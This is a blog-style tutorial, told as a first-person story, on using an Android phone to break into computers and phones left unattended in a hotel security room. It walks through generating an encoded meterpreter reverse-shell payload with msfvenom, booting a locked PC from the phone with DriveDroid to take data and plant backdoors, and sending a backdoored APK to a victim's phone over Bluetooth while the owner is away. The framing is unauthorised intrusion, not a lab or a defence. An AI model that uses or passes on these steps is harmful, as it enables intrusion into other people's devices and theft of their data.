Pentesting on the Fly : Android Phone - Part 1) My Phone Is an Infection Vector

Pentesting on the Fly : Android Phone - Part 1) My Phone Is an Infection Vector


Yohoho here's the first part !
We'll begin with simple tricks, before exploring the network.
--Keep in Mind that at each chapter you'll need to launch Linux Deploy, tap "Start", and then SSH android@localhost and type in changeme --

I'm a Young and full of ardor , active worker. Today, I'm on a journey to visit New-York-City. Aah New York, New York...
I took the train two hours ago, and now I'm striding through the city's Streets until i'll reach my hotel

I enter this little cosy hotel, ask for my room and let my things in my room.I've got a meeting tomorow, but... it's only 5 pm, and I've nothing to do... And i'm determined in not wasting my time sitting on a chair.

So I decide to explore this hotel... I've read some articles about social engineering and more particularly in hotels and i like to use it to gain access to some computers...But didn't brought my hacking PC and my live USB was drown into water... (yeah bad excuse huh...).
Whatever, i'll find a defenceless computer :D
I manage to find the control security room.

Image via But HAH the guards are too lazy to stay all day long in front of their screens and I hear them laughinh from the courtyard, badmouthing their boss ;)In front of me two computers and an android phone.
The first computer is leaved unlocked, but the second one is off and locked. The phone seems to be without any code.

If only I had my USB key with all my payloads and a live kali....But I'VE GOT A SOLUTION !
I quickly GRAB MY PHONE AND....

I) MAIN IDEAA smartphone is not that different from an USB key. But maybe less suspicious huh ? Or not... Whatever, the idea is
1) That you can use your phone to carry an Armada of payloads ready to infect any near PC.
Here's the plan :
  • At home : generate enough different payloads directly on your phone so they'll be available if there's an oppurtinity
  • Move them from your linux deploy environment to your SDcard
  • Tranfer them via :
a) USB wire
b) Wifi
c) Bluetooth
2) You can also trick someone into executing a malicious APK file to backdoor an Android phone
Here's the plan :
  • At home : generate enough different payloads
  • Move them from your linux deploy environment to your SDcard
  • Tranfer them via :
a) Wifi
b) Bluetooth
2)Use it to carry Linux live images to be able to unlock any PC and steal data from it :
Here's the plan :
  • Download a tiny linux usb image (around or less than 100mb)
  • Find a pc, and use it to unlock it and steal data/ put a payload/rootkit generated at step 1)

  • Follow my previous tutorial ;) -> here
  • Metasploit framework
  • Perhaps Veil-Evasion if you desire to hide your payload
  • OR any trojan you already programmed on a Windows machine, and which is ready to be used (take a look at my poston creating a C backdoor :
Part 1
Part 2
Part 3

Metasploit Framework :
apt-get install metasploit
apt-get install metasploit-framework

Optional : Veil-Evasion (or any other obfuscation tool)
cd Veil-master/setup

Optional : Your own trojan
Just copy it from your PC to your internal storage.
Screenshot ?

IV) GENERATING PAYLOADSThis will be quick as there's so much how-to, just take a look at OTW posts :)
a) Metasploit Method :
msfpayload path/to/payload OPTIONS(LHOST PORT...) X > backdoor.exe(or apk or ....)
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00' LHOST= LPORT=443 -f exe > you backdoor.exe

b) Veil-Evasion
Well huh... I must confess my installation of Veil lagged so I did abort it. But that's the same way of work : take a look at theses sites, it's really simple :

c) Shake your *ss and code it yourself ;)

There's multiple ways to send it as I stated before :
  • USb wire
  • Bluetooth
  • Wifi
This is smartphone's magic :)

(yeah pretty bad paint montage huh...)
Here's an example of a shell gained on a linux machine. You can also use meterpreter to have a persistent access.
Or use your own trojan :)
The backdor was sent with netcat from within my Kali environment

This was made using netcat, but it's easier for example to use Bluetooth or an USB wire :
If you generated your payload in your current directory , copy it to your sdcard :
cp payload.exe /mnt/0/
(/mnt/0 is the path to my sdcard from within the image)

There's still the second one. He's locked and I bet I might retrieve some cool infos....
DriveDroid application allows you to use your smartphone as a bootable USB :) as seen above :)
How it works:
•Connect your phone to your PC using an USB cable.
•Download an image file (.iso or .img) or create one. You can choose from the popular distros like Arch Linux, Gentoo, Crunchbang, FreeBSD, and more.
•Select the image file in DriveDroid to let your phone ‘host' the file over USB.
•(Re)start your PC and make sure the correct boot priority is set in the Bios.
•The image should now be booted on your PC.
(this part was copied from this website :
Here are some useful screenshots :)

Just launch drivedroid, download a minimalist linux image, and launch the usb hosting.Then... Well just use your phone as a bootable USB key !
You now have full access to the target computed, to install... Your backdoors, that you created in part1 :D

HoHoHo, I've now a hand on their system. If I can infect this phone, i'll have an excellent mobile pivot to anything in the phone's vincinity
As I stated before, you can also create backdoored apks with msfvenom/msfpayload.
I won't re-write a how-to as F.E.A.R already posted two excellent how to about it :
Here the idea is to have the backdoored apk onto the target's phone
The easiest way is to send it via Bluetooth :
This takes less thant 1 minute :
  • Active Bluetooth on both devices
  • (put your backdoored apk in your sdcard)
  • Connect both devices
  • Send your files
  • Remove your device from the target's history
  • Install the APK
(but i must admit that Bluetooth on phones is a bit unstable)
Just wait for the target to leave its phone or go to WC ;)


Nothing more to say :) just keep your ass safe !

X) Conclusion
So in this first part, we focused on "hardware" and local (no network) hacks/backdooring.
Next part will be focused on recon and network attacks !
If you have any suggestions/issues, feel free to contact me and post it in the comments :)
Tell me what you'd like to see and if you liked it :)

1 commentaire: